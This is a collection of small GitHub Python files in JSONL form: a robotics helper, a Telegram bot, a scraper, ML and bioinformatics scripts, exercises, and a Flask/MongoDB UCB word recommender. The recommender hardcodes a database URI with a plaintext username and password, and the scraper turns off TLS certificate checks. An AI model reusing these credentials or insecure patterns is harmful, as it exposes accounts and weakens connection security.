+{"seq_id":"20306377355","text":"\ndef move_x(location_x):\n \n \n # center x pixel\n center_x = 424\n\n # find difference between center and object, postive number means to the right\n diff_x = location_x - center_x\n\n #if object is to the right\n if (diff_x > 300):\n return 1\n\n elif (diff_x > 200):\n return 2\n\n elif (diff_x > 100):\n return 3\n\n elif (diff_x > 10):\n return 4\n\n #if object is to the left \n elif (diff_x < -300):\n return -1\n \n elif (diff_x < -200):\n return -2\n \n elif (diff_x < -100):\n return -3\n \n elif (diff_x < -10):\n return -4\n\n #if object is in neither then do nothing so return 0\n else:\n return 200\n\n# find direction to turn motor\ndef find_direction(data):\n direction = 0\n if (data > 0):\n direction = 0\n else:\n direction = 1\n direction = \"setDirection:\" + str(direction)\n return direction\n \n# calculate angle to send to motors\ndef calc_angle(data):\n angle = 0\n diff = abs(data)\n\n if diff == 1:\n angle = 30\n elif diff == 2:\n angle = 20\n elif diff == 3:\n angle = 10\n elif diff == 4:\n angle = 3\n else:\n angle = 0\n\n angle = \"moveMotor:\" + str(angle)\n return angle\n\n\n\n\n\ndef move_y(location_y):\n \n # center x pixel\n center_y = 240\n\n # find difference between center and object, postive number means to the right\n diff_y = location_y - center_y\n\n #if object is to the below\n if (diff_y > -200):\n return 1\n\n elif (diff_y > -100):\n return 2\n\n #if object is to the above \n elif (diff_y < 200):\n return -1\n \n elif (diff_y < 100):\n return -2\n\n #if object is in neither then do nothing so return 0\n else:\n return 200","repo_name":"ClaytonWilson12/nerf","sub_path":"scripts/servo_instruction.py","file_name":"servo_instruction.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40636754268","text":"#Библиотека c эмодзи\nfrom emoji import emojize\n#Импорт settings.py для сокрытия токенов, паролей и личных данных\nimport settings\n#Модуль random отвечает за работу со случайными числами, функция randint - за целые числа; choice - за выбор случайного элемента\nfrom random import randint, choice\n#Класс для создания клавиатур\nfrom telegram import ReplyKeyboardMarkup, KeyboardButton\n\n\n#Функция получения смайлика\ndef get_smile(user_data):\n if 'emoji' not in user_data:\n smile = choice(settings.USER_EMOJI)\n return emojize(smile, language='alias')# smile(текст) преобразуем в иконку смайлика, language='alias'(текстовые обозначения смайликов)\n return user_data['emoji']\n\n\n#Функция вывода результата, для игры в числа\ndef play_random_numbers(user_number):\n bot_number = randint(user_number - 10, user_number + 10)\n if user_number > bot_number:\n message = f'Твое число {user_number}, мое {bot_number}, ты выиграл'\n elif user_number == bot_number:\n message = f'Твое число {user_number}, мое {bot_number}, ничья'\n else:\n message = f'Твое число {user_number}, мое {bot_number}, ты проиграл'\n return message\n\n\n#Функция отправки случайной картинки при нажатии кнопки Прислать котика и отправки геолокации(работает с мобилы)\ndef main_keyboard():\n return ReplyKeyboardMarkup([\n ['Прислать котика', KeyboardButton('Мои координаты', request_location=True)]\n ])\n","repo_name":"Comandosss/mybot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"73417863080","text":"import requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport lxml.etree\nimport time\nimport random\n#urls = \"https://www.meituri.com/s/%d/\"%index\n\ndef getTree(url):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\n try:\n r=requests.get(url, timeout=5,headers = headers, verify = False)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n tree=lxml.etree.HTML(r.text)\n return tree\n except Exception as e:\n raise Exception(\"404\",e)\n return None\nindex = 1\nwhile True:\n urlx = \"https://www.meituri.com/x/%d/\"%index\n try:\n tree=getTree(urlx)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n detail=detail.replace(\"\\n\",\" \")\n print(index,urlx,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(1,3))\n\nprint(\"++++++++++++++\")\nindex = 9\nwhile True:\n urls = \"https://www.meituri.com/s/%d/\"%index\n try:\n tree=getTree(urls)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n print(index,urls,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(2,4))\n\n\"\"\"\nurl = \"https://www.meituri.com/x/1/\"\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\nr=requests.get(url, timeout=5,headers = headers, verify = False)\nprint(r.status_code)\nprint(len(r.text))\"\"\"","repo_name":"crj1998/meitu","sub_path":"meituAPI.py","file_name":"meituAPI.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38014986121","text":"from ase.build import mx2\nfrom ase import Atoms\nfrom ase.io import read, write\nfrom ase.calculators.espresso import Espresso\nimport math\n\ndef monolayer_MX2(formula, a, thickness,vacuum):\n crystal=mx2(formula=formula, kind='2H', a=a, thickness=thickness, size=(1,1,1), vacuum=None)\n #print(crystal.positions)\n #convert to all PBC cell\n slab=Atoms(crystal)\n slab.set_cell([crystal.cell[0],crystal.cell[1],[0.0,0.0,vacuum]], scale_atoms=False)\n slab.set_pbc([True, True, True])\n return slab\n\ndef monolayer_Xene(formula, a, buckling, vacuum):\n if vacuum is not None:\n buckling=buckling/vacuum\n\n positions=[[2/3, 1/3,buckling/2.0],[1/3,2/3,-buckling/2.0]]\n cell=[[a, 0, 0], [-a/2, a * 3**0.5 / 2, 0], [0, 0, 0]]\n atoms = Atoms(formula, positions=positions, cell=cell, pbc=(1, 1, 0))\n atoms.set_scaled_positions(positions)\n if vacuum is not None:\n atoms.center(vacuum, axis=2)\n return atoms\n\n\n\n\n","repo_name":"eminamitani/layeredMaterialToolKit","sub_path":"layeredMaterialToolKit/monolayer.py","file_name":"monolayer.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11669658912","text":"from decimal import Decimal\nimport logging\nimport requests\n\nfrom cryptofeed.defines import BID, ASK\nfrom cryptofeed.backends._util import book_convert, book_delta_convert\nfrom cryptofeed.backends.http import HTTPCallback\nfrom cryptofeed.exceptions import UnsupportedType\n\n\nLOG = logging.getLogger('feedhandler')\n\n\nclass InfluxCallback(HTTPCallback):\n def __init__(self, addr: str, db: str, create_db=True, numeric_type=str, **kwargs):\n \"\"\"\n Parent class for InfluxDB callbacks\n\n influxDB schema\n ---------------\n MEASUREMENT | TAGS | FIELDS\n\n Measurement: Data Feed-Exxhange (configurable)\n TAGS: pair\n FIELDS: timestamp, amount, price, other funding specific fields\n\n Example data in InfluxDB\n ------------------------\n > select * from COINBASE-book;\n name: COINBASE\n time amount pair price side timestamp\n ---- ------ ---- ----- ---- ---------\n 1542577584985404000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:24.963762Z\n 1542577584985404000 0.0015 BTC-USD 5542 ask 2018-11-18T21:46:24.963762Z\n 1542577585259616000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:25.256391Z\n\n Parameters\n ----------\n addr: str\n Address for connection. Should be in the format:\n http(s)://:port\n db: str\n Database to write to\n numeric_type: str/float\n Convert types before writing (amount and price)\n \"\"\"\n super().__init__(addr, **kwargs)\n self.addr = f\"{addr}/write?db={db}\"\n self.session = None\n self.numeric_type = numeric_type\n\n if create_db:\n r = requests.post(f'{addr}/query', data={'q': f'CREATE DATABASE {db}'})\n r.raise_for_status()\n\nclass TradeInflux(InfluxCallback):\n def __init__(self, *args, key='trades', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed: str, pair: str, side: str, amount: Decimal, price: Decimal, order_id=None, timestamp=None):\n amount = str(amount)\n price = str(price)\n\n if order_id is None:\n order_id = 'None'\n if self.numeric_type is str:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount=\"{amount}\",price=\"{price}\",timestamp={timestamp}'\n elif self.numeric_type is float:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount={amount},price={price},timestamp={timestamp}'\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n\n await self.write('POST', trade)\n\n\nclass FundingInflux(InfluxCallback):\n def __init__(self, *args, key='funding', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, **kwargs):\n data = f\"{self.key}-{feed},pair={pair} \"\n\n for key, val in kwargs.items():\n if key in {'feed', 'pair'}:\n continue\n if isinstance(val, (Decimal, float)):\n val = str(val)\n if self.numeric_type is str:\n val = f'\"{val}\"'\n elif self.numeric_type is not float:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n elif isinstance(val, str):\n val = f'\"{val}\"'\n data += f\"{key}={val},\"\n\n data = data[:-1]\n await self.write('POST', data)\n\n\nclass InfluxBookCallback(InfluxCallback):\n async def _write_rows(self, start, data, timestamp):\n msg = []\n ts = int(timestamp * 1000000000)\n for side in (BID, ASK):\n for price, val in data[side].items():\n if isinstance(val, dict):\n for order_id, amount in val.items():\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price=\"{price}\",amount=\"{amount}\" {ts}')\n elif 
self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price={price},amount={amount} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n else:\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price=\"{price}\",amount=\"{val}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price={price},amount={val} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n await self.write('POST', '\\n'.join(msg))\n\n\nclass BookInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', depth=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.depth = depth\n self.key = key\n self.previous = {BID: {}, ASK: {}}\n\n async def __call__(self, *, feed, pair, book, timestamp):\n data = {BID: {}, ASK: {}}\n book_convert(book, data, self.depth)\n\n if self.depth:\n if data[BID] == self.previous[BID] and data[ASK] == self.previous[ASK]:\n return\n self.previous[ASK] = data[ASK]\n self.previous[BID] = data[BID]\n\n start = f\"{self.key}-{feed},pair={pair},delta=False\"\n await self._write_rows(start, data, timestamp)\n\n\nclass BookDeltaInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, delta, timestamp):\n start = f\"{self.key}-{feed},pair={pair},delta=True\"\n data = {BID: {}, ASK: {}}\n book_delta_convert(delta, data)\n await self._write_rows(start, data, timestamp)\n","repo_name":"glgnohk/cryptofeed","sub_path":"cryptofeed/backends/influxdb.py","file_name":"influxdb.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"24335313925","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms\r\nfrom torch.autograd import Variable\r\nimport os\r\nimport numpy as np\r\nfrom dann_model import DANN_Neural_Network\r\nfrom dann_data import MNIST, SVHN\r\n\r\n\r\n# Training settings\r\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\r\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\r\n help='input batch size for training (default: 64)')\r\nparser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\r\n help='input batch size for testing (default: 1000)')\r\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\r\n help='number of epochs to train (default: 10)')\r\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\r\n help='learning rate (default: 0.01)')\r\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\r\n help='SGD momentum (default: 0.5)')\r\nparser.add_argument('--no-cuda', action='store_true', default=False,\r\n help='disables CUDA training')\r\nparser.add_argument('--seed', type=int, default=1, metavar='S',\r\n help='random seed (default: 1)')\r\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\r\n help='how many batches to wait before logging training status')\r\nparser.add_argument('--save_dir', type=str, default='./train',\r\n help=\"the path to save the trained model\")\r\nargs = parser.parse_args()\r\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\r\n\r\nif not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\ntorch.manual_seed(args.seed)\r\nif args.cuda:\r\n torch.cuda.manual_seed(args.seed)\r\n\r\nbatch_size = 128\r\n\r\n\r\n\r\ntest_dataset = SVHN(csv_file=\"./hw3_data/digits/svhn/test.csv\", root_dir=\"./hw3_data/digits/svhn/test\",transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\r\n ]))\r\n\r\n\r\n\r\ntrain_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True)\r\n\r\n\r\n\r\n\r\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\r\n\r\nmodel = DANN_Neural_Network()\r\n\r\nmodel_root = os.path.join('.','dann_NN_models/mnist_to_svhn')\r\n\r\nNN_test = torch.load(os.path.join(\r\n model_root, 'domainadaptation2_model28-0' + '.pth'\r\n ))\r\ncst = 0\r\nif args.cuda:\r\n model.cuda()\r\n\r\ndef generate_feature():\r\n model.eval()\r\n cnt = 0\r\n out_target = []\r\n out_data = []\r\n out_output =[]\r\n for data, target in train_loader:\r\n cnt += len(data)\r\n print(\"processing: %d/%d\" % (cnt, len(train_loader.dataset)))\r\n if args.cuda:\r\n data, target = data.cuda(), target.cuda()\r\n data, target = Variable(data, volatile=True), Variable(target)\r\n output = model(data)\r\n output_np = output.data.cpu().numpy()\r\n target_np = target.data.cpu().numpy()\r\n data_np = data.data.cpu().numpy()\r\n\r\n out_output.append(output_np)\r\n out_target.append(target_np[:, np.newaxis])\r\n out_data.append(np.squeeze(data_np))\r\n\r\n\r\n output_array = np.concatenate(out_output, axis=0)\r\n target_array = np.concatenate(out_target, axis=0)\r\n data_array = np.concatenate(out_data, axis=0)\r\n\r\n np.save(os.path.join(\"./tsne\", 'output.npy'), output_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'target.npy'), target_array, allow_pickle=False)\r\n 
np.save(os.path.join(\"./tsne\", 'data.npy'), data_array, allow_pickle=False)\r\n\r\ngenerate_feature()","repo_name":"amelieclautour/DLCV2019-Hw3-GAN","sub_path":"tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30658834279","text":"n = int(input())\nd = dict()\nl = []\n\nfor i in range(n-1):\n m = int(input())\n for j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n else:\n d[s] += 1\n\nm = int(input())\nfor j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n elif d[s] == n-1:\n l.append(s)\n\nprint(len(l))\nfor v in l:\n print(v)\nprint(len(d))\nfor k in d:\n print(k)","repo_name":"newRational/Yandex-algorithms-1.0","sub_path":"3/I/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"42572252483","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\n\n\ndef index(request):\n\n if request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to=\"/events/\")\n else:\n template = loader.get_template('home/index.html')\n context = {\n 'title': 'Welcome to Send Cloud BBQ Planner'\n }\n return HttpResponse(template.render(context, request))\n","repo_name":"pouyaist/BBQ_planner","sub_path":"bbq_planner/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4465650616","text":"from math import ceil\n\ndef calc_parking_costs(hours):\n return hours * 1.5;\n\ndef calc_parking_costs_detailed(hours):\n if hours <= 8:\n total = 0;\n\n if hours > 0: \n total += 2;\n hours -= 1;\n \n if hours > 0:\n total += 1.5;\n hours -= 1;\n\n if hours > 0:\n total += hours * 1;\n\n return total;\n else:\n # the parking time is \"a day or more\"\n return ceil(hours / 24) * 10;\n\ndef is_coin_or_note(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n\n return money in correct_values;\n\ndef calc_returned_coins_and_notes(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n correct_values.sort(reverse=True);\n\n returned_values = {};\n\n for correct_value in correct_values:\n while money >= correct_value:\n money -= correct_value;\n if not correct_value in returned_values.keys():\n returned_values[correct_value] = 1;\n else:\n returned_values[correct_value] += 1;\n\n return returned_values;\n\ndef output_returned_money(returned_values: dict):\n for money_value, amount in returned_values.items():\n print(\"Sie bekommen {}x {} EUR.\".format(amount, money_value));\n\n\nhours = ceil(float(input(\"Geparkte Stunden: \")));\n\ncurrent_cost = calc_parking_costs_detailed(hours);\n\nprint(\"Es werden {} Euro fällig\".format(current_cost));\n\ntotal_paid = 0;\ntotal_return = 0;\nwhile current_cost > total_paid:\n paid_money_input = input(\"Wieviel zahlen Sie ein: \");\n\n try:\n paid_money = float(paid_money_input);\n\n total_paid += paid_money;\n\n if current_cost > total_paid:\n print(\"Sie müssen noch {} EUR bezahlen.\".format(current_cost));\n else:\n total_return = total_paid - current_cost;\n break;\n except:\n print(\"Vorgang abgebrochen.\");\n total_return = total_paid;\n\nif total_return > 0:\n returned_values = calc_returned_coins_and_notes(total_return);\n output_returned_money(returned_values);\n\nprint(\"Vielen Dank und auf Wiedersehen\");\n","repo_name":"TnTGamesTV/python-lesson","sub_path":"lesson3/A3_3242157.py","file_name":"A3_3242157.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74140031720","text":"\nimport bisect\nimport os\nimport json\nimport glob\n\nPROBLEM_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nDATA_DIR = f'{PROBLEM_DIR}/data'\nRESULTS_DIR = f'{PROBLEM_DIR}/results'\n\ndef loadProblems(fn):\n ret = {}\n fp = open(fn, 'r')\n \n num_isoforms, delta = [int(s) for s in fp.readline().rstrip().split(' ')]\n isoforms = []\n for x in range(0, num_isoforms):\n isoforms.append(fp.readline().rstrip())\n \n num_reads = int(fp.readline())\n reads = []\n for x in range(0, num_reads):\n reads.append(fp.readline().rstrip())\n\n fp.close()\n\n ret['isoforms'] = isoforms\n ret['reads'] = reads\n ret['delta'] = delta\n\n return ret\n\ndef parseRanges(s):\n regions = s.split(',')\n ret = []\n for r in regions:\n s, e = r.split('-')\n ret.append((int(s), int(e)))\n return ret\n\ndef solveProblem(problem):\n #Load the problem dict (or list of problem dicts)\n isoforms = problem['isoforms']\n reads = problem['reads']\n delta = problem['delta']\n num_isoforms = len(isoforms)\n\n #initial answers are all -1 and 0\n first_match = [-1]*len(reads)\n num_match = [0]*len(reads)\n\n #strategy: iterate through each isoform, compare to the read to mark as a match or not; first find goes into find bucket\n print('Preprocessing reads...')\n parsed_reads = [parseRanges(r) for r in reads]\n\n print('Isoform iterating...')\n for iso_num, isoform in enumerate(isoforms):\n print(f'\\tIsoform #{iso_num} / {num_isoforms}...')\n iso_ranges = parseRanges(isoform)\n #print(iso_ranges)\n for read_num, pr in enumerate(parsed_reads):\n #print(pr)\n #compare them here\n pr_start = pr[0]\n ind = bisect.bisect(iso_ranges, pr_start)\n \n initial_check = max(0, ind-1)\n maximal_check = min(len(iso_ranges), ind+1)\n \n initial_range = -1\n for si in range(initial_check, maximal_check):\n curr_range = iso_ranges[si]\n if (pr_start[0] >= curr_range[0]-delta and\n abs(pr_start[1] - curr_range[1]) <= delta):\n #this is the initial range\n initial_range = si\n break\n \n if initial_range != -1 and (initial_range+len(pr) <= len(iso_ranges)):\n #this is a candidate, check all the in-between regions\n mismatch = False\n for offset in range(1, len(pr)-1):\n pr_range = pr[offset]\n curr_range = iso_ranges[initial_range+offset]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n abs(pr_range[1] - curr_range[1]) <= delta):\n #still good\n pass\n else:\n mismatch = True\n break\n\n #TODO: finally check the tail region\n pr_range = pr[-1]\n curr_range = iso_ranges[initial_range+len(pr)-1]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n pr_range[1] <= curr_range[1]+delta):\n pass\n else:\n mismatch = True\n\n if not mismatch:\n num_match[read_num] += 1\n if first_match[read_num] == -1:\n first_match[read_num] = iso_num\n\n #exit()\n\n print('Getting results...')\n results = {\n 'first_match' : first_match,\n 'num_match' : num_match\n }\n return results\n \ndef writeResults(fn, all_results):\n fp = open(fn, 'w+')\n first_match = all_results['first_match']\n num_match = all_results['num_match']\n for i, fm in enumerate(first_match):\n fp.write(f'{fm} {num_match[i]}\\n')\n fp.close()\n\nif __name__ == '__main__':\n #there are usually multiple per problem\n all_filenames = sorted(glob.glob(f'{DATA_DIR}/*.txt'))\n starting_problem = 6\n ending_problem = 6\n\n if not os.path.exists(RESULTS_DIR):\n os.makedirs(RESULTS_DIR)\n\n #go through each ones\n for problem in range(starting_problem, ending_problem+1):\n #filenames below might need to change per problem\n print(f'Analyzing 
problem set #{problem}...')\n #fn = f'{DATA_DIR}/{problem}.txt'\n fn = all_filenames[problem]\n fno = f'{RESULTS_DIR}/{problem}.txt'\n\n #load the problems for this set\n problems = loadProblems(fn)\n\n #generate results for each one\n all_results = solveProblem(problems)\n\n #finally save the results\n writeResults(fno, all_results)\n","repo_name":"holtjma/bio_contest_2021","sub_path":"problem_3.6/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"}
+{"seq_id":"12370855658","text":"from random import sample\n\nimport math\nimport requests\nfrom flask import jsonify\nfrom flask_restx import Resource, Namespace, fields\nfrom pymongo import MongoClient\n\n# define namespace\nns = Namespace('ucb', description='ucb operations')\n\n\n# MongoDB 연결 설정\nmongodb_uri = \"mongodb+srv://p4dsteam6:team6@cluster0.yvkcbg6.mongodb.net/\"\nclient = MongoClient(mongodb_uri)\ndb = client['mindmapDB']\ncollections = {\n 'marketer': db['marketer_ucb'],\n 'developer': db['developer_ucb'],\n 'designer': db['designer_ucb'],\n}\n\n\ndef get_db():\n client = MongoClient(mongodb_uri)\n db = client['mindmapDB']\n return db\n\n\ndef get_collection(user_type):\n if user_type in collections:\n db = get_db()\n return db[user_type+'_ucb']\n\n\ndef related_word(word, limit=100):\n try:\n word = word.lower()\n url = f'http://api.conceptnet.io/c/en/{word}?rel=/r/RelatedTo&limit={limit}'\n response = requests.get(url)\n response.raise_for_status() # Raises stored HTTPError, if one occurred.\n data = response.json()\n except (requests.HTTPError, ValueError) as err:\n print(f'An error occurred: {err}')\n return []\n else:\n related_words = []\n for item in data['edges']:\n if item['rel']['label'] == 'RelatedTo':\n related = item['start']['label'].lower() if item['start']['label'].lower() != word else item['end']['label'].lower()\n if related not in related_words:\n related_words.append(related)\n return related_words\n\n\ndef store_word_and_related_words(word, user_type, limit=100):\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n related_words = related_word(word, limit)\n for a_word in related_words:\n doc = collection.find_one({\"word\": a_word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n\ndef center_word(word, user_type, num_samples=10):\n store_word_and_related_words(word, user_type, limit=100)\n words = related_word(word, limit=100)\n return sample(words, num_samples)\n\n\ndef get_word_params(word, user_type):\n \"\"\"\n Get the parameters of a word for Thompson Sampling from the database.\n If the word does not exist in the database, initialize it with 1 success and 1 failure.\n \"\"\"\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n else:\n params = doc[\"params\"]\n return params\n\n\ndef update_word_params(word, user_type, success):\n \"\"\"\n Update the parameters of a word for Thompson Sampling in the database.\n If success is True, increment the successes of the word.\n If success is False, increment the failures of the word.\n \"\"\"\n collection = get_collection(user_type)\n params = get_word_params(word, user_type)\n if success:\n params[\"successes\"] += 1\n else:\n params[\"failures\"] += 1\n collection.update_one({\"word\": word}, {\"$set\": {\"params\": params}})\n\n\ndef process_feedback(recommended_words, user_type, selected_word):\n \"\"\"\n Process the feedback of a user.\n If the selected word is in the recommended words, consider it a success for that word.\n \"\"\"\n success = (selected_word in recommended_words)\n update_word_params(selected_word, user_type, 
success)\n\n\ndef get_ucb(total, success, num_samples, c):\n \"\"\"\n Calculate the Upper Confidence Bound (UCB)\n \"\"\"\n if total == 0:\n return float('inf')\n average = success / total\n # UCB1 exploration bonus: divide by this arm's pull count, not its success count\n ucb = average + math.sqrt((c * math.log(num_samples)) / total)\n return ucb\n\n\ndef recommend_words_ucb(user_type, c, num_recommendations=10):\n \"\"\"\n Recommend a list of words using Upper Confidence Bound (UCB)\n \"\"\"\n collection = get_collection(user_type)\n # materialize the cursor: a pymongo cursor is exhausted after one iteration\n words = list(collection.find({}))\n word_samples = []\n total_samples = 0\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n total_samples += params[\"successes\"] + params[\"failures\"]\n\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n ucb = get_ucb(params[\"successes\"] + params[\"failures\"], params[\"successes\"], total_samples, c)\n word_samples.append((word, ucb))\n\n word_samples.sort(key=lambda x: x[1], reverse=True)\n recommended_words = [word for word, ucb in word_samples[:num_recommendations]]\n return recommended_words\n\n\n@ns.route('/center/<word>/<user_type>')\n@ns.doc({'parameters': [{'name': 'word', 'in': 'path', 'type': 'string', 'required': True},\n {'name': 'user_type', 'in': 'path', 'type': 'string', 'required': True}]})\nclass centerWord(Resource):\n def get(self, word, user_type):\n suggestions = center_word(word, user_type)\n return jsonify(suggestions)\n\n\nlist_item_model = ns.model('ListItem', {\n 'center_word': fields.String(required=True, description='Center word'),\n 'user_type': fields.String(required=True, description='User type')\n})\n\n\n@ns.route('/human/<choice_word>/<c>')\n@ns.doc({'parameters': [{'name': 'choice_word', 'in': 'path', 'type': 'string', 'required': True}]})\nclass humanFeedback(Resource):\n @ns.expect(list_item_model)\n def post(self, choice_word, c):\n c = float(c) # path parameters arrive as strings\n recommended_words = recommend_words_ucb(ns.payload['user_type'], c, num_recommendations=10)\n process_feedback(recommended_words, ns.payload['user_type'], choice_word)\n return jsonify(recommended_words)","repo_name":"GSDSProject/project","sub_path":"home/views/word/similarWord_ucb.py","file_name":"similarWord_ucb.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
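The scoring in the record above is the classic UCB1 rule: the empirical mean reward plus an exploration bonus that grows with total experience and shrinks with how often a word has been tried. A minimal, self-contained sketch of that scoring, assuming in-memory stats instead of MongoDB (the words and counts below are invented for illustration):

import math

def ucb1_score(successes, failures, total_pulls, c=2.0):
    # pulls of this arm; the 1/1 prior used above keeps this positive
    pulls = successes + failures
    if pulls == 0:
        return float('inf')  # never-tried arm: explore it first
    mean = successes / pulls
    # bonus grows with the log of global pulls, shrinks with this arm's pulls
    return mean + math.sqrt(c * math.log(total_pulls) / pulls)

# hypothetical per-word stats: {word: (successes, failures)}
stats = {"design": (9, 3), "logo": (2, 2), "branding": (1, 7)}
total = sum(s + f for s, f in stats.values())
ranked = sorted(stats, key=lambda w: ucb1_score(*stats[w], total), reverse=True)
print(ranked)

The bonus term is why a rarely-shown word can outrank one with a better observed mean: uncertainty is rewarded until enough feedback accumulates.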
